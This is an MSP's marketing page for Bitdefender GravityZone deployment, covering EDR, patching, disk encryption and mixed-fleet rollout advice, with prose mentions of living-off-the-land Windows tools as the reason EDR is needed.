Get Started
BITDEFENDER PARTNER

Bitdefender GravityZone
Done Properly
One Agent. Three OSes.

EDR, XDR, Patch Management, Full Disk Encryption and Email Security, deployed and tuned by an MSP that has lived in the GravityZone portal since 2018. Windows, macOS and Linux from a single console.

Book a Free GravityZone Audit → See What's Included
Bitdefender GravityZone
2018
GravityZone since
1
Agent for all three OSes
~150
Third-party apps patched
R0
Hidden remediation surprises
Partner credentials & platform coverage
Bitdefender
Partner since 2015
Windows
EDR & XDR
macOS
Same agent & console
Linux Servers
Full EDR telemetry
Patch Mgmt
~150 third-party apps
GravityZone Business Sales certified
Business Sales ↗
 GravityZone Technical Solutions Professional certified
Technical TSP ↗
Bitdefender partner since 2018
Windows, macOS and Linux from one console
ZAR billing · local invoicing
Sandton-based · SA-only clients
Real engineer · no support ticket queue

Endpoint security as most SMEs have it, versus done properly.

What we typically find on a first audit, and what changes after a GravityZone deployment.

The typical SME on audit day
AV running. EDR: not a thing.Commodity malware blocked fine. Human attacker living off the land, certutil, bitsadmin, PowerShell, goes completely unnoticed.
Macs and Linux servers are invisibleDefender-only shops have zero telemetry on anything that isn't Windows. Attackers know this. That's where they pivot.
Chrome hasn't been patched in 6 weeksThird-party apps patched "when someone gets around to it." The CVE was fixed by the vendor in February. It's April.
"We think most laptops are encrypted"No central enforcement, no auditable recovery keys. Insurer asks for encryption evidence. There is none.
VS
With GravityZone + OSH
Process trees. The full attack chain. One incident view.EDR shows PowerShell launched by Word reaching out to an IP in Belarus. Actual context, not "anomaly detected, severity medium."
Windows, macOS and Linux, same console, same telemetryOne agent across all three OSes. Ubuntu servers, Apple Silicon Macs, Windows desktops, all visible, all policy-enforced.
150 third-party apps patched automaticallyChrome, Zoom, Acrobat, Teams, 7-Zip, AnyDesk, scheduled and deployed. No one needs to remember.
FDE enforced, recovery keys auditableBitLocker and FileVault managed centrally. Compliance evidence is a report export, not a spreadsheet someone made in 2022.
The honest picture

Most SMEs we audit have antivirus. Almost none have EDR. The gap is where breaches live.

AV catches the known-bad file. It does not catch the attacker who has already bypassed the AV and is now using Windows' own signed binaries, certutil.exe to decode a payload, bitsadmin.exe to download from a CDN, mshta.exe to execute a script from a remote server. None of these are malware. All of them are standard Windows tools. AV sees signed binaries doing things signed binaries do. EDR sees the sequence, and the sequence is the attack.

The dwell time problem makes this worse. The average time between initial compromise and detection in an SME environment is still measured in weeks. The attacker spends that time mapping the network, identifying the backup target, locating the finance shares, harvesting credentials. By the time a ransom note appears, lateral movement happened days ago. EDR doesn't always prevent the initial foothold, but it does dramatically compress the window between entry and detection.

The mixed-fleet version of this is worse. Defender-only shops have meaningful telemetry on Windows endpoints and none at all on macOS or Linux. Every attacker who has read a penetration testing report knows that Macs in a Windows-centric org are under-monitored. Linux servers running web apps on AWS with no EDR are a free pivot point once someone exploits the web app. "Linux doesn't get viruses" was approximately true in 2005. The attackers didn't get that memo.

A fully patched Windows fleet with Defender on Business Premium and someone who reads the alerts is genuinely decent endpoint security, for a 100% Windows org with no Linux and no Macs. The moment that stops being true, the gaps appear fast. We will tell you honestly whether you need to move.

The cyber-insurance angle is no longer theoretical. Renewal questionnaires for 2026 explicitly ask whether EDR with continuous monitoring is deployed. "We have antivirus" used to satisfy underwriters. It does not now. POPIA Section 19 requires appropriate technical measures, South African regulators are interpreting that with EDR-shaped expectations for anything handling regulated data. The compliance case for EDR is no longer optional for most businesses we work with.

GRAVITYZONE MODULES

GravityZone Modules We Deploy

EDR: Endpoint Detection & Response
Process trees, command-line activity, registry changes and network connections correlated into readable incidents. PowerShell launched by Word, reaching out to Belarus, not 'anomaly detected, severity medium.'
XDR: Extended Detection & Response
Widens EDR telemetry to include Microsoft 365, Google Workspace, network appliances and identity providers. One incident timeline: phish in the inbox, suspicious login, process on the laptop.
Patch Management
OS patches plus ~150 common third-party apps: Chrome, Edge, Firefox, Java, Acrobat, Zoom, Teams, 7-Zip, AnyDesk. The most common cause of compromise we see is an unpatched browser plugin, not a zero-day.
Full Disk Encryption
Management layer for native BitLocker (Windows) and FileVault (macOS). Recovery keys live in the GravityZone console, auditable and exportable. The encryption engine is OS-native, which is the correct answer.
Email Security
Cloud-based layer in front of Microsoft 365 or Google Workspace for URL/attachment scanning, sender reputation and sandbox detonation. Complements DMARC. It does not replace it.
Risk Management Dashboard
Scores every endpoint on misconfiguration (open RDP, weak password policy, SMBv1, autorun) and on user behaviour. Turns a GravityZone audit into something you can actually measure, not a 'you should be better' report.
Under the hood

Three things most GravityZone deployments get wrong

The licence is the easy part. Policy build, OS-specific tuning, and the mixed-fleet blind spots are where self-managed rollouts run into trouble.

01. Policy build: default settings will quarantine your backup software

GravityZone ships with sensible defaults that are not the right defaults for your environment. Default Advanced Threat Control settings flag backup agents, RMM tools, and legitimate admin scripts as suspicious, because they are behaviourally indistinguishable from malware. A rollout that goes straight to maximum sensitivity without a pilot phase will have your backup software quarantined and your IT team fielding calls within 48 hours.

The correct sequence: pilot group of 10–20 endpoints across your actual OS mix, observe for two weeks in Detection-only mode, tune ATC exclusions for known-legitimate tooling, validate Patch Management schedules don't fire during business hours, then roll to the full fleet. We write the exclusion list as part of the engagement. You get a policy that is actually tuned to your environment, not the same BEST template every MSP ships unchanged.

02. Mixed fleet: macOS and Linux need specific attention

The GravityZone macOS agent requires a set of system extension approvals (full disk access, network filtering extension, device management profile) that are not automatically granted on user-provisioned Macs. MDM deployment, via Intune or Hexnode, is the correct path. On an unmanaged Mac, the approval workflow requires physical user interaction at the device, which scales poorly past ten endpoints. We handle the MDM profile push as part of the rollout rather than leaving it as a user self-service step.

Linux is different again. The correct agent variant depends on the kernel version and distribution. Ubuntu 22.04 LTS needs a different kernel module build than Amazon Linux 2023. On RHEL-family systems, the SELinux policy interaction matters. We have run these combinations on actual client servers, Ubuntu, Debian, Rocky Linux, SUSE Enterprise, Amazon Linux, and know which edge cases to check before declaring an agent healthy. "Green in the console" is not the same as "kernel module loaded and on-access scanning active."

03. AV removal: two security products on one endpoint is not a transition state

Two AV products on the same endpoint compete for file-system hooks, slow each other down, and produce conflicting quarantine actions. Some combinations cause boot loops. The transition window, old AV still present, GravityZone agent just installed, needs to be measured in hours, not days. We script removal of common products as part of every deployment: Sophos, ESET, Kaspersky, Trend Micro, Norton, McAfee, Avast, AVG. Windows Defender gets pushed to passive mode automatically by the GravityZone installer, but it is worth verifying passive mode actually engaged rather than assuming.

The other side of this is the Defender-integrated tooling that stops working when Defender goes passive. If your organisation uses Defender for Endpoint Plan 2 for its Conditional Access device-health integration, switching to GravityZone breaks that signal. We check for Defender dependencies before removal, not after. If your Intune Conditional Access policies depend on Defender health status, that conversation needs to happen at scoping, not at go-live.

HOW IT WORKS

How We Deploy GravityZone

01
Audit & Sizing

Free GravityZone health check or pre-sales scoping: endpoint count, OS mix, current AV, compliance drivers (POPIA, GDPR, cyber-insurance), and incident history. We size the licence tier honestly. You will not get upsold to XDR if EDR is what you need.

02
Pilot & Policy Build

Test group of 10–20 endpoints across your actual OS mix. We build BEST policies from a known-good baseline and tune Advanced Threat Control before any wide rollout. We want to surface false positives on the pilot, not after.

03
Phased Rollout

Group-by-group deployment with old-AV removal scripts where needed. We have written removal flows for Sophos, ESET, Kaspersky, Trend Micro, Norton, McAfee, Avast and AVG over the years. Patch Management and FDE switch on once endpoints are stable.

04
Managed Operations

Weekly Risk Management dashboard review, monthly patch reporting, EDR incident triage as alerts arrive. Quarterly policy refresh as Bitdefender ships new detection content and the picture changes.

GravityZone vs Defender for Business vs DIY

The honest comparison, for when you're deciding whether to move.

Capability GravityZone EDR
OSH managed		 Defender for Business
M365 Business Premium		 GravityZone
Self-managed
Windows endpoint protection
macOS EDR coverage Limited
Linux server EDR
Third-party app patching (~150 apps)
Central FDE key management Via Intune
Policy tuned to your environment Defaults only
ZAR billing · SA-based support

Defender for Business ships with M365 Business Premium. GravityZone is licensed separately through OSH, we quote against your existing AV renewal.

Get a Free GravityZone Health Check

If you already run Bitdefender, we will audit your policies, patch posture, EDR coverage and Risk Management score, and send you a written report. If you don't, we will scope a pilot against your current AV. No obligation. Real engineer. Real findings.

Book a free audit → Email us directly
QUESTIONS

GravityZone Questions We Get Every Week

For a 100% Windows fleet on Microsoft 365 Business Premium with the licence already paid, Defender for Business is fine and we will say so. The moment you have a Mac, a Linux server, or you want patch management and full disk encryption in the same console, Defender starts to fall over. GravityZone covers all three OSes from one console, ships with stronger ransomware rollback, and the EDR tier includes managed-detection workflows Defender for Business does not have. The honest counter-point: Defender’s integration with Conditional Access and Microsoft Sentinel is tighter than anything a third party can offer on Microsoft’s own stack. If you are heading toward a full Sentinel SOC, that matters.

Pricing is per endpoint per year and depends on the tier (Business Security, Business Security Premium, EDR, XDR) and term length. Bitdefender publishes a list price; OSH passes through partner pricing and invoices in ZAR. We are happy to quote against your current AV renewal. You usually save money and get more modules.

Standard AV catches commodity malware. EDR catches the human attacker who has already bypassed the AV: the one running PowerShell, dumping credentials, moving laterally using legitimate Windows binaries like certutil.exe, bitsadmin.exe, mshta.exe. If you are subject to POPIA, GDPR, SOC 2, or any cyber-insurance policy renewing in 2026, EDR is no longer optional. Underwriters now ask about it explicitly.

Yes, and properly. The Linux agent is a real on-access scanner with kernel-module support for Ubuntu 20.04/22.04/24.04 LTS, Debian 11/12, RHEL/Rocky/Alma 8/9, SUSE Enterprise, and Amazon Linux 2/2023. You get the same EDR telemetry as the Windows agent. If you are running web-facing Linux with no EDR on it, that is the highest-risk gap in your environment and we will tell you so.

On a current machine, no. The single-agent architecture is lighter than running Defender plus a third-party patcher plus a separate encryption tool. On older hardware (pre-8th-gen Intel) we tune scan exclusions and process-monitoring scope as part of the rollout. It is standard practice, not a workaround.

You probably don’t need it for the encryption itself. BitLocker and FileVault are already the right tools. GravityZone FDE is a management layer: it enforces encryption policy centrally, stores and audits recovery keys in the console, and gives you instant proof for auditors or insurers that every device in the fleet is encrypted. If Intune already manages BitLocker recovery keys for you, the GravityZone FDE add-on is redundant. We will tell you that in the scoping call.

Bitdefender Email Security is a strong content/URL/attachment layer in front of Microsoft 365 and Google Workspace. It is not a replacement for properly configured DMARC, SPF and DKIM, which are still mandatory for deliverability and anti-spoofing. GravityZone Email Security handles inbound content; DMARC handles authentication. You want both, and they solve different problems.

Yes. We script the removal of common products (Sophos, ESET, Kaspersky, Trend Micro, Norton, McAfee, Avast, AVG) as part of the GravityZone deployment package. Defender on Windows gets pushed to passive mode automatically by the GravityZone installer. No reboot loops, no double-AV conflicts.

Most clients we work with land on Business Security Premium (the rebadged Advanced) or GravityZone EDR. Business Security Premium suits a mixed-fleet SME with no in-house SOC that wants patch management, encryption and better detection than base AV without the EDR overhead. GravityZone EDR is for anyone with compliance drivers, a cyber-insurance renewal questionnaire, or regulated data. XDR is for businesses with a security analyst on staff or an MDR partner who will actually consume the cross-layer telemetry. We will tell you honestly which way to lean in the audit. If you are still weighing the two top tiers, we will walk you through the decision.

Get a Free GravityZone Health Check

If you already run Bitdefender, we will audit your policies, patch posture, EDR coverage and Risk Management score, and send you a written report. If you don't, we will scope a pilot against your current AV. No obligation. Real engineer. Real findings.

Email us directly support@osh.co.za

Get in touch

Related services
Pair GravityZone with proper device management Hexnode and Intune for the same fleet you're protecting. How GravityZone sits alongside Defender for Business Tenant build, Conditional Access, and the honest comparison. Have us run the whole stack Managed IT for South African businesses since 2001.